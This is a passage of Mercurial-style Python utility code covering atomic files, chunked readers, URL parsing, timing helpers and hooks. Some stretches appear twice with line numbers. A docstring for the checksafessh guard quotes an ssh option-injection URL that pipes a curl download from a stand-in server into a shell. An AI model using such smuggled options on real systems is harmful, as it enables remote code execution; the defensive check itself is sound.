    checkambig argument of constructor is used with filestat, and is
    useful only if target file is guarded by any lock (e.g. repo.lock
    or repo.wlock).
    '''
    def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
        self.__name = name # permanent name
        self._tempname = mktempcopy(name, emptyok=('w' in mode),
                                    createmode=createmode)
        self._fp = posixfile(self._tempname, mode)
        self._checkambig = checkambig

        # delegated methods
        self.read = self._fp.read
        self.write = self._fp.write
        self.seek = self._fp.seek
        self.tell = self._fp.tell
        self.fileno = self._fp.fileno

    def close(self):
        if not self._fp.closed:
            self._fp.close()
            filename = localpath(self.__name)
            oldstat = self._checkambig and filestat.frompath(filename)
            if oldstat and oldstat.stat:
                rename(self._tempname, filename)
                newstat = filestat.frompath(filename)
                if newstat.isambig(oldstat):
                    # stat of changed file is ambiguous to original one
                    advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
                    os.utime(filename, (advanced, advanced))
            else:
                rename(self._tempname, filename)

    def discard(self):
        if not self._fp.closed:
            try:
                os.unlink(self._tempname)
            except OSError:
                pass
            self._fp.close()

    def __del__(self):
        if safehasattr(self, '_fp'): # constructor actually did something
            self.discard()

    def __enter__(self):
        return self

    def __exit__(self, exctype, excvalue, traceback):
        if exctype is not None:
            self.discard()
        else:
            self.close()
2229 def unlinkpath(f, ignoremissing=False, rmdir=True):
2229 def unlinkpath(f, ignoremissing=False, rmdir=True):
2230 """unlink and remove the directory if it is empty"""
2230 """unlink and remove the directory if it is empty"""
2231 if ignoremissing:
2231 if ignoremissing:
2232 tryunlink(f)
2232 tryunlink(f)
2233 else:
2233 else:
2234 unlink(f)
2234 unlink(f)
2235 if rmdir:
2235 if rmdir:
2236 # try removing directories that might now be empty
2236 # try removing directories that might now be empty
2237 try:
2237 try:
2238 removedirs(os.path.dirname(f))
2238 removedirs(os.path.dirname(f))
2239 except OSError:
2239 except OSError:
2240 pass
2240 pass
2241
2241
2242 def tryunlink(f):
2242 def tryunlink(f):
2243 """Attempt to remove a file, ignoring ENOENT errors."""
2243 """Attempt to remove a file, ignoring ENOENT errors."""
2244 try:
2244 try:
2245 unlink(f)
2245 unlink(f)
2246 except OSError as e:
2246 except OSError as e:
2247 if e.errno != errno.ENOENT:
2247 if e.errno != errno.ENOENT:
2248 raise
2248 raise

def makedirs(name, mode=None, notindexed=False):
    """recursive directory creation with parent mode inheritance

    Newly created directories are marked as "not to be indexed by
    the content indexing service", if ``notindexed`` is specified
    for "write" mode access.
    """
    try:
        makedir(name, notindexed)
    except OSError as err:
        if err.errno == errno.EEXIST:
            return
        if err.errno != errno.ENOENT or not name:
            raise
        parent = os.path.dirname(os.path.abspath(name))
        if parent == name:
            raise
        makedirs(parent, mode, notindexed)
        try:
            makedir(name, notindexed)
        except OSError as err:
            # Catch EEXIST to handle races
            if err.errno == errno.EEXIST:
                return
            raise
    if mode is not None:
        os.chmod(name, mode)

def readfile(path):
    with open(path, 'rb') as fp:
        return fp.read()

def writefile(path, text):
    with open(path, 'wb') as fp:
        fp.write(text)

def appendfile(path, text):
    with open(path, 'ab') as fp:
        fp.write(text)

class chunkbuffer(object):
    """Allow arbitrary sized chunks of data to be efficiently read from an
    iterator over chunks of arbitrary size."""

    def __init__(self, in_iter):
        """in_iter is the iterator that's iterating over the input chunks."""
        def splitbig(chunks):
            for chunk in chunks:
                if len(chunk) > 2**20:
                    pos = 0
                    while pos < len(chunk):
                        end = pos + 2 ** 18
                        yield chunk[pos:end]
                        pos = end
                else:
                    yield chunk
        self.iter = splitbig(in_iter)
        self._queue = collections.deque()
        self._chunkoffset = 0

    def read(self, l=None):
        """Read L bytes of data from the iterator of chunks of data.
        Returns less than L bytes if the iterator runs dry.

        If size parameter is omitted, read everything"""
        if l is None:
            return ''.join(self.iter)

        left = l
        buf = []
        queue = self._queue
        while left > 0:
            # refill the queue
            if not queue:
                target = 2**18
                for chunk in self.iter:
                    queue.append(chunk)
                    target -= len(chunk)
                    if target <= 0:
                        break
                if not queue:
                    break

            # The easy way to do this would be to queue.popleft(), modify the
            # chunk (if necessary), then queue.appendleft(). However, for cases
            # where we read partial chunk content, this incurs 2 dequeue
            # mutations and creates a new str for the remaining chunk in the
            # queue. Our code below avoids this overhead.

            chunk = queue[0]
            chunkl = len(chunk)
            offset = self._chunkoffset

            # Use full chunk.
            if offset == 0 and left >= chunkl:
                left -= chunkl
                queue.popleft()
                buf.append(chunk)
                # self._chunkoffset remains at 0.
                continue

            chunkremaining = chunkl - offset

            # Use all of unconsumed part of chunk.
            if left >= chunkremaining:
                left -= chunkremaining
                queue.popleft()
                # offset == 0 is enabled by block above, so this won't merely
                # copy via ``chunk[0:]``.
                buf.append(chunk[offset:])
                self._chunkoffset = 0

            # Partial chunk needed.
            else:
                buf.append(chunk[offset:offset + left])
                self._chunkoffset += left
                left -= chunkremaining

        return ''.join(buf)
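
# A minimal sketch of chunkbuffer semantics (not part of the original
# module): chunks of arbitrary size go in, fixed-size reads come out.
def _chunkbufferdemo():
    buf = chunkbuffer(iter([b'abc', b'defg', b'h']))
    assert buf.read(4) == b'abcd'
    assert buf.read(10) == b'efgh'   # iterator ran dry: short read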

def filechunkiter(f, size=131072, limit=None):
    """Create a generator that produces the data in the file size
    (default 131072) bytes at a time, up to optional limit (default is
    to read all data). Chunks may be less than size bytes if the
    chunk is the last chunk in the file, or the file is a socket or
    some other type of file that sometimes reads less data than is
    requested."""
    assert size >= 0
    assert limit is None or limit >= 0
    while True:
        if limit is None:
            nbytes = size
        else:
            nbytes = min(limit, size)
        s = nbytes and f.read(nbytes)
        if not s:
            break
        if limit:
            limit -= len(s)
        yield s
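
# A minimal sketch of filechunkiter (not part of the original module):
# a 300000-byte stream yields two full 131072-byte chunks plus a short tail.
def _filechunkiterdemo():
    fp = bytesio(b'x' * 300000)
    sizes = [len(chunk) for chunk in filechunkiter(fp)]
    assert sizes == [131072, 131072, 37856]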

class cappedreader(object):
    """A file object proxy that allows reading up to N bytes.

    Given a source file object, instances of this type allow reading up to
    N bytes from that source file object. Attempts to read past the allowed
    limit are treated as EOF.

    It is assumed that I/O is not performed on the original file object
    in addition to I/O that is performed by this instance. If there is,
    state tracking will get out of sync and unexpected results will ensue.
    """
    def __init__(self, fh, limit):
        """Allow reading up to <limit> bytes from <fh>."""
        self._fh = fh
        self._left = limit

    def read(self, n=-1):
        if not self._left:
            return b''

        if n < 0:
            n = self._left

        data = self._fh.read(min(n, self._left))
        self._left -= len(data)
        assert self._left >= 0

        return data

    def readinto(self, b):
        res = self.read(len(b))
        if res is None:
            return None

        b[0:len(res)] = res
        return len(res)
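
# A minimal sketch of cappedreader (not part of the original module):
# reads beyond the cap behave like EOF.
def _cappedreaderdemo():
    capped = cappedreader(bytesio(b'0123456789'), 4)
    assert capped.read() == b'0123'
    assert capped.read() == b''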

def unitcountfn(*unittable):
    '''return a function that renders a readable count of some quantity'''

    def go(count):
        for multiplier, divisor, format in unittable:
            if abs(count) >= divisor * multiplier:
                return format % (count / float(divisor))
        return unittable[-1][2] % count

    return go

def processlinerange(fromline, toline):
    """Check that linerange <fromline>:<toline> makes sense and return a
    0-based range.

    >>> processlinerange(10, 20)
    (9, 20)
    >>> processlinerange(2, 1)
    Traceback (most recent call last):
      ...
    ParseError: line range must be positive
    >>> processlinerange(0, 5)
    Traceback (most recent call last):
      ...
    ParseError: fromline must be strictly positive
    """
    if toline - fromline < 0:
        raise error.ParseError(_("line range must be positive"))
    if fromline < 1:
        raise error.ParseError(_("fromline must be strictly positive"))
    return fromline - 1, toline

bytecount = unitcountfn(
    (100, 1 << 30, _('%.0f GB')),
    (10, 1 << 30, _('%.1f GB')),
    (1, 1 << 30, _('%.2f GB')),
    (100, 1 << 20, _('%.0f MB')),
    (10, 1 << 20, _('%.1f MB')),
    (1, 1 << 20, _('%.2f MB')),
    (100, 1 << 10, _('%.0f KB')),
    (10, 1 << 10, _('%.1f KB')),
    (1, 1 << 10, _('%.2f KB')),
    (1, 1, _('%.0f bytes')),
    )
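
# For instance (illustrative, derived from the table above):
# bytecount(100) -> '100 bytes', bytecount(2048) -> '2.00 KB' and
# bytecount(1 << 20) -> '1.00 MB'.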

class transformingwriter(object):
    """Writable file wrapper to transform data by function"""

    def __init__(self, fp, encode):
        self._fp = fp
        self._encode = encode

    def close(self):
        self._fp.close()

    def flush(self):
        self._fp.flush()

    def write(self, data):
        return self._fp.write(self._encode(data))

# Matches a single EOL which can either be a CRLF where repeated CR
# are removed or a LF. We do not care about old Macintosh files, so a
# stray CR is an error.
_eolre = remod.compile(br'\r*\n')

def tolf(s):
    return _eolre.sub('\n', s)

def tocrlf(s):
    return _eolre.sub('\r\n', s)

def _crlfwriter(fp):
    return transformingwriter(fp, tocrlf)

if pycompat.oslinesep == '\r\n':
    tonativeeol = tocrlf
    fromnativeeol = tolf
    nativeeolwriter = _crlfwriter
else:
    tonativeeol = pycompat.identity
    fromnativeeol = pycompat.identity
    nativeeolwriter = pycompat.identity
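
# A minimal sketch of the EOL helpers (not part of the original module):
# tolf() collapses CRLF (and CR runs before LF) to LF, tocrlf() does the
# reverse, and tonativeeol/fromnativeeol pick whichever direction matches
# pycompat.oslinesep.
def _eoldemo():
    assert tolf(b'a\r\nb\n') == b'a\nb\n'
    assert tocrlf(b'a\nb\r\n') == b'a\r\nb\r\n'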

if (pyplatform.python_implementation() == 'CPython' and
    sys.version_info < (3, 0)):
    # There is an issue in CPython that some IO methods do not handle EINTR
    # correctly. The following table shows what CPython version (and functions)
    # are affected (buggy: has the EINTR bug, okay: otherwise):
    #
    #                | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
    #   --------------------------------------------------
    #    fp.__iter__ | buggy   | buggy           | okay
    #    fp.read*    | buggy   | okay [1]        | okay
    #
    # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
    #
    # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
    # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
    #
    # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
    # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
    # CPython 2, because CPython 2 maintains an internal readahead buffer for
    # fp.__iter__ but not other fp.read* methods.
    #
    # On modern systems like Linux, the "read" syscall cannot be interrupted
    # when reading "fast" files like on-disk files. So the EINTR issue only
    # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
    # files approximately as "fast" files and use the fast (unsafe) code path,
    # to minimize the performance impact.
    if sys.version_info >= (2, 7, 4):
        # fp.readline deals with EINTR correctly, use it as a workaround.
        def _safeiterfile(fp):
            return iter(fp.readline, '')
    else:
        # fp.read* are broken too, manually deal with EINTR in a stupid way.
        # note: this may block longer than necessary because of bufsize.
        def _safeiterfile(fp, bufsize=4096):
            fd = fp.fileno()
            line = ''
            while True:
                try:
                    buf = os.read(fd, bufsize)
                except OSError as ex:
                    # os.read only raises EINTR before any data is read
                    if ex.errno == errno.EINTR:
                        continue
                    else:
                        raise
                line += buf
                if '\n' in buf:
                    splitted = line.splitlines(True)
                    line = ''
                    for l in splitted:
                        if l[-1] == '\n':
                            yield l
                        else:
                            line = l
                if not buf:
                    break
            if line:
                yield line

    def iterfile(fp):
        fastpath = True
        if type(fp) is file:
            fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
        if fastpath:
            return fp
        else:
            return _safeiterfile(fp)
else:
    # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
    def iterfile(fp):
        return fp
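
# Illustrative use of iterfile (not part of the original module): wrap a
# file object before iterating so that, on old CPython 2 interpreters,
# line iteration over pipes/sockets survives EINTR while regular files
# keep the fast native path.
#
#   for line in iterfile(fp):
#       handle(line)            # 'handle' is a hypothetical callback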

def iterlines(iterator):
    for chunk in iterator:
        for line in chunk.splitlines():
            yield line

def expandpath(path):
    return os.path.expanduser(os.path.expandvars(path))

def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
    """Return the result of interpolating items in the mapping into string s.

    prefix is a single character string, or a two character string with
    a backslash as the first character if the prefix needs to be escaped in
    a regular expression.

    fn is an optional function that will be applied to the replacement text
    just before replacement.

    escape_prefix is an optional flag that makes a doubled prefix serve as
    an escape for the prefix itself.
    """
    fn = fn or (lambda s: s)
    patterns = '|'.join(mapping.keys())
    if escape_prefix:
        patterns += '|' + prefix
        if len(prefix) > 1:
            prefix_char = prefix[1:]
        else:
            prefix_char = prefix
        mapping[prefix_char] = prefix_char
    r = remod.compile(br'%s(%s)' % (prefix, patterns))
    return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
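
# A minimal sketch of interpolate (not part of the original module): the
# prefix is backslash-escaped because '$' is special in regular expressions.
def _interpolatedemo():
    s = interpolate(br'\$', {b'user': b'alice'}, b'hello $user')
    assert s == b'hello alice'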

def getport(port):
    """Return the port for a given network service.

    If port is an integer, it's returned as is. If it's a string, it's
    looked up using socket.getservbyname(). If there's no matching
    service, error.Abort is raised.
    """
    try:
        return int(port)
    except ValueError:
        pass

    try:
        return socket.getservbyname(pycompat.sysstr(port))
    except socket.error:
        raise error.Abort(_("no port number associated with service '%s'")
                          % port)
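
# For instance (illustrative): getport(8080) returns 8080 unchanged, while
# getport(b'http') consults socket.getservbyname() and typically returns 80.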

class url(object):
    r"""Reliable URL parser.

    This parses URLs and provides attributes for the following
    components:

    <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>

    Missing components are set to None. The only exception is
    fragment, which is set to '' if present but empty.

    If parsefragment is False, fragment is included in query. If
    parsequery is False, query is included in path. If both are
    False, both fragment and query are included in path.

    See http://www.ietf.org/rfc/rfc2396.txt for more information.

    Note that for backward compatibility reasons, bundle URLs do not
    take host names. That means 'bundle://../' has a path of '../'.

    Examples:

    >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
    <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
    >>> url(b'ssh://[::1]:2200//home/joe/repo')
    <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
    >>> url(b'file:///home/joe/repo')
    <url scheme: 'file', path: '/home/joe/repo'>
    >>> url(b'file:///c:/temp/foo/')
    <url scheme: 'file', path: 'c:/temp/foo/'>
    >>> url(b'bundle:foo')
    <url scheme: 'bundle', path: 'foo'>
    >>> url(b'bundle://../foo')
    <url scheme: 'bundle', path: '../foo'>
    >>> url(br'c:\foo\bar')
    <url path: 'c:\\foo\\bar'>
    >>> url(br'\\blah\blah\blah')
    <url path: '\\\\blah\\blah\\blah'>
    >>> url(br'\\blah\blah\blah#baz')
    <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
    >>> url(br'file:///C:\users\me')
    <url scheme: 'file', path: 'C:\\users\\me'>

    Authentication credentials:

    >>> url(b'ssh://joe:xyz@x/repo')
    <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
    >>> url(b'ssh://joe@x/repo')
    <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>

    Query strings and fragments:

    >>> url(b'http://host/a?b#c')
    <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
    >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
    <url scheme: 'http', host: 'host', path: 'a?b#c'>

    Empty path:

    >>> url(b'')
    <url path: ''>
    >>> url(b'#a')
    <url path: '', fragment: 'a'>
    >>> url(b'http://host/')
    <url scheme: 'http', host: 'host', path: ''>
    >>> url(b'http://host/#a')
    <url scheme: 'http', host: 'host', path: '', fragment: 'a'>

    Only scheme:

    >>> url(b'http:')
    <url scheme: 'http'>
    """

    _safechars = "!~*'()+"
    _safepchars = "/!~*'()+:\\"
    _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match

    def __init__(self, path, parsequery=True, parsefragment=True):
        # We slowly chomp away at path until we have only the path left
        self.scheme = self.user = self.passwd = self.host = None
        self.port = self.path = self.query = self.fragment = None
        self._localpath = True
        self._hostport = ''
        self._origpath = path

        if parsefragment and '#' in path:
            path, self.fragment = path.split('#', 1)

        # special case for Windows drive letters and UNC paths
        if hasdriveletter(path) or path.startswith('\\\\'):
            self.path = path
            return

        # For compatibility reasons, we can't handle bundle paths as
        # normal URLS
        if path.startswith('bundle:'):
            self.scheme = 'bundle'
            path = path[7:]
            if path.startswith('//'):
                path = path[2:]
            self.path = path
            return

        if self._matchscheme(path):
            parts = path.split(':', 1)
            if parts[0]:
                self.scheme, path = parts
                self._localpath = False

        if not path:
            path = None
            if self._localpath:
                self.path = ''
                return
        else:
            if self._localpath:
                self.path = path
                return

            if parsequery and '?' in path:
                path, self.query = path.split('?', 1)
                if not path:
                    path = None
                if not self.query:
                    self.query = None

            # // is required to specify a host/authority
            if path and path.startswith('//'):
                parts = path[2:].split('/', 1)
                if len(parts) > 1:
                    self.host, path = parts
                else:
                    self.host = parts[0]
                    path = None
                if not self.host:
                    self.host = None
                    # path of file:///d is /d
                    # path of file:///d:/ is d:/, not /d:/
                    if path and not hasdriveletter(path):
                        path = '/' + path

            if self.host and '@' in self.host:
                self.user, self.host = self.host.rsplit('@', 1)
                if ':' in self.user:
                    self.user, self.passwd = self.user.split(':', 1)
                if not self.host:
                    self.host = None

            # Don't split on colons in IPv6 addresses without ports
            if (self.host and ':' in self.host and
                not (self.host.startswith('[') and self.host.endswith(']'))):
                self._hostport = self.host
                self.host, self.port = self.host.rsplit(':', 1)
                if not self.host:
                    self.host = None

            if (self.host and self.scheme == 'file' and
                self.host not in ('localhost', '127.0.0.1', '[::1]')):
                raise error.Abort(_('file:// URLs can only refer to localhost'))

        self.path = path

        # leave the query string escaped
        for a in ('user', 'passwd', 'host', 'port',
                  'path', 'fragment'):
            v = getattr(self, a)
            if v is not None:
                setattr(self, a, urlreq.unquote(v))

    @encoding.strmethod
    def __repr__(self):
        attrs = []
        for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
                  'query', 'fragment'):
            v = getattr(self, a)
            if v is not None:
                attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
        return '<url %s>' % ', '.join(attrs)

    def __bytes__(self):
        r"""Join the URL's components back into a URL string.

        Examples:

        >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
        'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
        'http://user:pw@host:80/?foo=bar&baz=42'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
        'http://user:pw@host:80/?foo=bar%3dbaz'
        >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
        'ssh://user:pw@[::1]:2200//home/joe#'
        >>> bytes(url(b'http://localhost:80//'))
        'http://localhost:80//'
        >>> bytes(url(b'http://localhost:80/'))
        'http://localhost:80/'
        >>> bytes(url(b'http://localhost:80'))
        'http://localhost:80/'
        >>> bytes(url(b'bundle:foo'))
        'bundle:foo'
        >>> bytes(url(b'bundle://../foo'))
        'bundle:../foo'
        >>> bytes(url(b'path'))
        'path'
        >>> bytes(url(b'file:///tmp/foo/bar'))
        'file:///tmp/foo/bar'
        >>> bytes(url(b'file:///c:/tmp/foo/bar'))
        'file:///c:/tmp/foo/bar'
        >>> print(url(br'bundle:foo\bar'))
        bundle:foo\bar
        >>> print(url(br'file:///D:\data\hg'))
        file:///D:\data\hg
        """
        if self._localpath:
            s = self.path
            if self.scheme == 'bundle':
                s = 'bundle:' + s
            if self.fragment:
                s += '#' + self.fragment
            return s

        s = self.scheme + ':'
        if self.user or self.passwd or self.host:
            s += '//'
        elif self.scheme and (not self.path or self.path.startswith('/')
                              or hasdriveletter(self.path)):
            s += '//'
            if hasdriveletter(self.path):
                s += '/'
        if self.user:
            s += urlreq.quote(self.user, safe=self._safechars)
        if self.passwd:
            s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
        if self.user or self.passwd:
            s += '@'
        if self.host:
            if not (self.host.startswith('[') and self.host.endswith(']')):
                s += urlreq.quote(self.host)
            else:
                s += self.host
        if self.port:
            s += ':' + urlreq.quote(self.port)
        if self.host:
            s += '/'
        if self.path:
            # TODO: similar to the query string, we should not unescape the
            # path when we store it, the path might contain '%2f' = '/',
            # which we should *not* escape.
            s += urlreq.quote(self.path, safe=self._safepchars)
        if self.query:
            # we store the query in escaped form.
            s += '?' + self.query
        if self.fragment is not None:
            s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
        return s

    __str__ = encoding.strmethod(__bytes__)

    def authinfo(self):
        user, passwd = self.user, self.passwd
        try:
            self.user, self.passwd = None, None
            s = bytes(self)
        finally:
            self.user, self.passwd = user, passwd
        if not self.user:
            return (s, None)
        # authinfo[1] is passed to urllib2 password manager, and its
        # URIs must not contain credentials. The host is passed in the
        # URIs list because Python < 2.4.3 uses only that to search for
        # a password.
        return (s, (None, (s, self.host),
                    self.user, self.passwd or ''))
2909
2909
2910 def isabs(self):
2910 def isabs(self):
2911 if self.scheme and self.scheme != 'file':
2911 if self.scheme and self.scheme != 'file':
2912 return True # remote URL
2912 return True # remote URL
2913 if hasdriveletter(self.path):
2913 if hasdriveletter(self.path):
2914 return True # absolute for our purposes - can't be joined()
2914 return True # absolute for our purposes - can't be joined()
2915 if self.path.startswith(br'\\'):
2915 if self.path.startswith(br'\\'):
2916 return True # Windows UNC path
2916 return True # Windows UNC path
2917 if self.path.startswith('/'):
2917 if self.path.startswith('/'):
2918 return True # POSIX-style
2918 return True # POSIX-style
2919 return False
2919 return False
2920
2920
2921 def localpath(self):
2921 def localpath(self):
2922 if self.scheme == 'file' or self.scheme == 'bundle':
2922 if self.scheme == 'file' or self.scheme == 'bundle':
2923 path = self.path or '/'
2923 path = self.path or '/'
2924 # For Windows, we need to promote hosts containing drive
2924 # For Windows, we need to promote hosts containing drive
2925 # letters to paths with drive letters.
2925 # letters to paths with drive letters.
2926 if hasdriveletter(self._hostport):
2926 if hasdriveletter(self._hostport):
2927 path = self._hostport + '/' + self.path
2927 path = self._hostport + '/' + self.path
2928 elif (self.host is not None and self.path
2928 elif (self.host is not None and self.path
2929 and not hasdriveletter(path)):
2929 and not hasdriveletter(path)):
2930 path = '/' + path
2930 path = '/' + path
2931 return path
2931 return path
2932 return self._origpath
2932 return self._origpath
2933
2933
2934 def islocal(self):
2934 def islocal(self):
2935 '''whether localpath will return something that posixfile can open'''
2935 '''whether localpath will return something that posixfile can open'''
2936 return (not self.scheme or self.scheme == 'file'
2936 return (not self.scheme or self.scheme == 'file'
2937 or self.scheme == 'bundle')
2937 or self.scheme == 'bundle')
2938
2938
2939 def hasscheme(path):
2939 def hasscheme(path):
2940 return bool(url(path).scheme)
2940 return bool(url(path).scheme)
2941
2941
2942 def hasdriveletter(path):
2942 def hasdriveletter(path):
2943 return path and path[1:2] == ':' and path[0:1].isalpha()
2943 return path and path[1:2] == ':' and path[0:1].isalpha()
2944
2944
2945 def urllocalpath(path):
2945 def urllocalpath(path):
2946 return url(path, parsequery=False, parsefragment=False).localpath()
2946 return url(path, parsequery=False, parsefragment=False).localpath()

def checksafessh(path):
    """check if a path / url is a potentially unsafe ssh exploit (SEC)

    This is a sanity check for ssh urls. ssh will parse the first item as
    an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
    Let's prevent these potentially exploitable urls entirely and warn the
    user.

    Raises an error.Abort when the url is unsafe.
    """
    path = urlreq.unquote(path)
    if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
        raise error.Abort(_('potentially unsafe url: %r') %
                          (pycompat.bytestr(path),))

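# Illustrative sketch (added for exposition; not part of upstream util.py).
# Shows checksafessh() accepting a normal url and rejecting an
# option-injection attempt. The urls and the _example* name are hypothetical.
def _examplechecksafessh():
    checksafessh('ssh://user@host/repo')    # fine, returns None
    try:
        checksafessh('ssh://-oProxyCommand=touch${IFS}owned/path')
    except error.Abort:
        pass    # the leading '-' would make ssh treat the host as an option
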
def hidepassword(u):
    '''hide user credential in a url string'''
    u = url(u)
    if u.passwd:
        u.passwd = '***'
    return bytes(u)

def removeauth(u):
    '''remove all authentication information from a url string'''
    u = url(u)
    u.user = u.passwd = None
    return bytes(u)

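# Illustrative sketch (exposition only; not upstream code): the two scrubbing
# helpers above differ in what they keep. The url values are hypothetical.
def _examplescrubauth():
    hidepassword('http://alice:secret@example.com/repo')
    # -> 'http://alice:***@example.com/repo' (user kept, password masked)
    removeauth('http://alice:secret@example.com/repo')
    # -> 'http://example.com/repo' (user and password both dropped)
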
timecount = unitcountfn(
    (1, 1e3, _('%.0f s')),
    (100, 1, _('%.1f s')),
    (10, 1, _('%.2f s')),
    (1, 1, _('%.3f s')),
    (100, 0.001, _('%.1f ms')),
    (10, 0.001, _('%.2f ms')),
    (1, 0.001, _('%.3f ms')),
    (100, 0.000001, _('%.1f us')),
    (10, 0.000001, _('%.2f us')),
    (1, 0.000001, _('%.3f us')),
    (100, 0.000000001, _('%.1f ns')),
    (10, 0.000000001, _('%.2f ns')),
    (1, 0.000000001, _('%.3f ns')),
    )

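# Example renderings for the table above (exposition only; not upstream
# code). timecount() walks the rows in order and uses the first row whose
# threshold (multiplier * divisor) the value meets.
def _exampletimecount():
    timecount(4.2)          # -> '4.200 s', via the (1, 1, '%.3f s') row
    timecount(0.0042)       # -> '4.200 ms', via the (1, 0.001, ...) row
    timecount(0.00000042)   # -> '420.0 ns', via the (100, 1e-9, ...) row
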
@attr.s
class timedcmstats(object):
    """Stats information produced by the timedcm context manager on entering."""

    # the starting value of the timer as a float (meaning and resolution is
    # platform dependent, see util.timer)
    start = attr.ib(default=attr.Factory(lambda: timer()))
    # the number of seconds as a floating point value; starts at 0, updated when
    # the context is exited.
    elapsed = attr.ib(default=0)
    # the number of nested timedcm context managers.
    level = attr.ib(default=1)

    def __bytes__(self):
        return timecount(self.elapsed) if self.elapsed else '<unknown>'

    __str__ = encoding.strmethod(__bytes__)

@contextlib.contextmanager
def timedcm(whencefmt, *whenceargs):
    """A context manager that produces timing information for a given context.

    On entering, a timedcmstats instance is produced.

    This context manager is reentrant.
    """
    # track nested context managers
    timedcm._nested += 1
    timing_stats = timedcmstats(level=timedcm._nested)
    try:
        with tracing.log(whencefmt, *whenceargs):
            yield timing_stats
    finally:
        timing_stats.elapsed = timer() - timing_stats.start
        timedcm._nested -= 1

timedcm._nested = 0

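# Usage sketch (exposition only; not upstream code): nesting is tracked via
# the module-level counter, so the inner stats carry a deeper level.
def _exampletimedcm():
    with timedcm('outer %s', 'work') as outer:
        with timedcm('inner %s', 'work') as inner:
            pass
    # outer.level == 1, inner.level == 2; both .elapsed values now hold the
    # wall-clock seconds spent inside their respective blocks.
    return outer, inner
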
def timed(func):
    '''Report the execution time of a function call to stderr.

    During development, use as a decorator when you need to measure
    the cost of a function, e.g. as follows:

    @util.timed
    def foo(a, b, c):
        pass
    '''

    def wrapper(*args, **kwargs):
        with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
            result = func(*args, **kwargs)
        stderr = procutil.stderr
        stderr.write('%s%s: %s\n' % (
            ' ' * time_stats.level * 2, pycompat.bytestr(func.__name__),
            time_stats))
        return result
    return wrapper

_sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
              ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))

def sizetoint(s):
    '''Convert a space specifier to a byte count.

    >>> sizetoint(b'30')
    30
    >>> sizetoint(b'2.2kb')
    2252
    >>> sizetoint(b'6M')
    6291456
    '''
    t = s.strip().lower()
    try:
        for k, u in _sizeunits:
            if t.endswith(k):
                return int(float(t[:-len(k)]) * u)
        return int(t)
    except ValueError:
        raise error.ParseError(_("couldn't parse size: %s") % s)

class hooks(object):
    '''A collection of hook functions that can be used to extend a
    function's behavior. Hooks are called in lexicographic order,
    based on the names of their sources.'''

    def __init__(self):
        self._hooks = []

    def add(self, source, hook):
        self._hooks.append((source, hook))

    def __call__(self, *args):
        self._hooks.sort(key=lambda x: x[0])
        results = []
        for source, hook in self._hooks:
            results.append(hook(*args))
        return results

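# Usage sketch (exposition only; not upstream code): regardless of the order
# in which hooks are added, they run sorted by their source name.
def _examplehooks():
    h = hooks()
    h.add('zz-extension', lambda x: x + 1)
    h.add('aa-extension', lambda x: x * 10)
    return h(3)    # [30, 4]: 'aa-extension' sorts, and thus runs, first
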
def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
    '''Yields lines for a nicely formatted stacktrace.
    Skips the 'skip' last entries, then returns the last 'depth' entries.
    Each file+linenumber is formatted according to fileline.
    Each line is formatted according to line.
    If line is None, it yields:
      length of longest filepath+line number,
      filepath+linenumber,
      function

    Not to be used in production code but very convenient while developing.
    '''
    entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
               for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
               ][-depth:]
    if entries:
        fnmax = max(len(entry[0]) for entry in entries)
        for fnln, func in entries:
            if line is None:
                yield (fnmax, fnln, func)
            else:
                yield line % (fnmax, fnln, func)

def debugstacktrace(msg='stacktrace', skip=0,
                    f=procutil.stderr, otherf=procutil.stdout, depth=0):
    '''Writes a message to f (stderr) with a nicely formatted stacktrace.
    Skips the 'skip' entries closest to the call, then shows 'depth' entries.
    By default it will flush stdout first.
    It can be used everywhere and intentionally does not require an ui object.
    Not to be used in production code but very convenient while developing.
    '''
    if otherf:
        otherf.flush()
    f.write('%s at:\n' % msg.rstrip())
    for line in getstackframes(skip + 1, depth=depth):
        f.write(line)
    f.flush()

class dirs(object):
    '''a multiset of directory names from a dirstate or manifest'''

    def __init__(self, map, skip=None):
        self._dirs = {}
        addpath = self.addpath
        if safehasattr(map, 'iteritems') and skip is not None:
            for f, s in map.iteritems():
                if s[0] != skip:
                    addpath(f)
        else:
            for f in map:
                addpath(f)

    def addpath(self, path):
        dirs = self._dirs
        for base in finddirs(path):
